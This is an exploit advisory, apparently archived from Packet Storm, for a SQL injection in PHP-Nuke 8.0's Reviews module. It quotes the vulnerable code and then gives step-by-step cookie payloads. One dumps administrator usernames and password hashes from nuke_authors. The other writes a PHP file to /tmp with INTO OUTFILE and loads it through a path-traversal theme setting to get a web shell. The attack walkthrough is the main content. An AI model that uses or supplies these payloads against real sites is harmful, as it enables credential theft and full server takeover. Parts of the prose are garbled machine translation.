PHP-Nuke versions 8.0 and below suffers from a remote SQL injection vulnerability that allows for remote command execution.
cdbc52450076c79386f007838ef8ed6f====================================
PHP-Nuke <= 8.0 SQL-Inj3ct0r Exploit
====================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
Product: PHP-Nuke
Version: 8.0
site: rus-phpnuke.com
/modules/Reviews/index.php
Vulnerable code:
$uname = filter($cookie[1], "nohtml");
$id = intval($id);
$score = intval($score);
if (is_user($user)) {
$krow = $db->sql_fetchrow($db->sql_query("SELECT karma FROM ".$user_prefix."_users WHERE username='$uname'"));
if ($krow['karma'] == 2) {
$db->sql_query("insert into ".$prefix."_reviews_comments_moderated values (NULL, '$id', '$uname', now(), '$comments', '$score')");
include("header.php");
title(""._MODERATEDTITLE."");
OpenTable();
echo "<center>"._COMMENTMODERATED."";
echo "<br><br><a href=\"modules.php?name=$module_name&rop=showcontent&id=$id\">"._MODERATEDTITLE."</a>";
CloseTable();
include("footer.php");
die();
} elseif ($krow['karma'] == 3) {
Header("Location: modules.php?name=$module_name&rop=showcontent&id=$id");
die();
}
}
$db->sql_query("insert into ".$prefix."_reviews_comments values (NULL, '$id', '$uname', now(), '$comments', '$score')");
------------------------
Here there once 2 sql-inj3ct0r, to select and insert queries, after raskadirovki Cookie is sleshirovanie data, but in this code snippet, data from $ cookie [1] fall into the filter
------------------------
function filter($what, $strip="", $save="", $type="") {
if ($strip == "nohtml") {
$what = check_html($what, $strip);
// $what = htmlentities(trim($what), ENT_QUOTES);
// If the variable $what doesn't comes from a preview screen should be converted
if ($type != "preview" AND $save != 1) {
$what = html_entity_decode($what, ENT_QUOTES);
}
}
if ($save == 1) {
$what = check_words($what);
$what = check_html($what, $strip);
if (!get_magic_quotes_gpc()) {
$what = addslashes($what);
}
} else {
$what = stripslashes(FixQuotes($what,$strip));
$what = check_words($what);
$what = check_html($what, $strip);
}
return($what);
}
-------------------------------
and thence to filter check_html
-------------------------------
function check_html ($str, $strip="") {
/* The core of this code has been lifted from phpslash */
/* which is licenced under the GPL. */
include("config.php");
if ($strip == "nohtml")
$AllowableHTML=array('');
$str = stripslashes($str);
$str = eregi_replace("<[[:space:]]*([^>]*)[[:space:]]*>",'<\\1>', $str);
// Delete all spaces from html tags .
$str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?[[:space:]]*([^\" >]*)[[:space:]]*\"?[^>]*>",'<a href="\\1">', $str);
// Delete all attribs from Anchor, except an href, double quoted.
$str = eregi_replace("<[[:space:]]* img[[:space:]]*([^>]*)[[:space:]]*>", '', $str);
// Delete all img tags
$str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?javascript[[:punct:]]*\"?[^>]*>", '', $str);
// Delete javascript code from a href tags -- Zhen-Xjell @ http://nukecops.com
$tmp = "";
while (ereg("<(/?[[:alpha:]]*)[[:space:]]*([^>]*)>",$str,$reg)) {
$i = strpos($str,$reg[0]);
$l = strlen($reg[0]);
if ($reg[1][0] == "/") $tag = strtolower(substr($reg[1],1));
else $tag = strtolower($reg[1]);
if ($a = $AllowableHTML[$tag])
if ($reg[1][0] == "/") $tag = "</$tag>";
elseif (($a == 1) || ($reg[2] == "")) $tag = "<$tag>";
else {
# Place here the double quote fix function.
$attrb_list=delQuotes($reg[2]);
// A VER
//$attrb_list = ereg_replace("&","&",$attrb_list);
$tag = "<$tag" . $attrb_list . ">";
} # Attribs in tag allowed
else $tag = "";
$tmp .= substr($str,0,$i) . $tag;
$str = substr($str,$i+$l);
}
$str = $tmp . $str;
return $str;
exit;
/* Squash PHP tags unconditionally */
$str = ereg_replace("<\?","",$str);
return $str;
}
where shielding escaped successfully removed, so it becomes possible to implement our sql code, through the cheekbones to select the data output can not, therefore, used inj3ct0r to insert
Come in
/modules.php?name=Reviews&rop=showcontent&id=1
choose any review, click "Insert comment"
throw in a cookie
base64_encode(yourid:yournick',1,(select concat(aid,0x3a,pwd) from nuke_authors),3)/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)
Click submit, as a result we get the login: hash admin
But over the cheekbones to select when file_priv can fill shell, throw in a cookie:
base64_encode(yourid:yournick' union select 0x3c3f20706870696e666f28293b203f3e into outfile '/tmp/theme.php'/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)
Then the path can not disclose, pour in tmp, and then simply poured through the shell templetes, for this go to /modules.php?Name=Your_Account&op=chgtheme
Human SORS, where it is written the name of the topic, in my case, value = RusNuke2003 write:
<option value="/../../../../../../../tmp/" >RusNuke2003
save, get shell =))
----------------------------------------------
ThE End =] Visit my proj3ct :
http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net
# ~ - [ [ : Inj3ct0r : ] ]
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!